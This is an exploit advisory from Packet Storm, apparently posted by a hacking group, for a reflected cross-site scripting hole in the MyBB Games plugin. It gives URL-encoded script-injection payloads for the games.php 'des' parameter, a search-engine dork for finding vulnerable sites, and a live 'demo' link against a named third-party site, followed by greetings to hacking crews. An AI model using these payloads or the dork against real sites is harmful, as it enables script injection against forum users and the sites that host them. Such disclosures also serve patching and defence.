MyBB Games Cross Site Scripting

2013-05-06T00:00:00
ID PACKETSTORM:121529
Type packetstorm
Reporter Darksnipper
Modified 2013-05-06T00:00:00

Description

                                        
                                            `################################################################  
#  
# Exploit Title :Mybb Games xss Vul  
#  
# Author : DarkSnipper ,Dream.Killer & Soul~inj3ctor  
#  
# Discovered By : Darksnipper@live.com  
# Home : http://cybercoders.org  
#  
#Link : http://mods.mybb.com/view/game-section  
#  
# Security Risk : High  
#  
# Version : All  
#  
# Tested on : GNU/Linux Ubuntu - Windows Server - win7  
#  
# Dork : intext:"Powered By mybb"  
#  
######################################################################  
#  
# Expl0iT :http://www.site.com/games.php?des=%27%22%3E%3E%3Cscript%3Ealert%28%27+by+Darksnipper%27%29%3C%2Fscript%3E  
or  
http://www.site.com/scriptlocation/games.php?des=%27%22%3E%3E%3Cscript%3Ealert%28%27+by+Darksnipper%27%29%3C%2Fscript%3E  
#  
Demo:http://www.cyberhut.in/games.php?des=%27%22%3E%3E%3Cscript%3Ealert%28%27+by+snipper%27%29%3C%2Fscript%3E  
#Greetz:Error Haxor,Dream.killer,Soul~Inj3ctor,Dr.v!ru$,Shadow008,H4x0rl1f3,X3o-1337,Force-ex,Retn0Hack,P4k-comm4nder,1337,Madcode,Anons  
Dexter,Sen Haxor,Dr.z0mbie,Trick,Pak Cyber Army,Madleets,Z Company  
Hacking Crew,Badwares Team,Kashmir Cyber Army, Anonymous  
Pakistan,3xp1r3 Cyber Army And All Muslim Hackers.  
################################  
`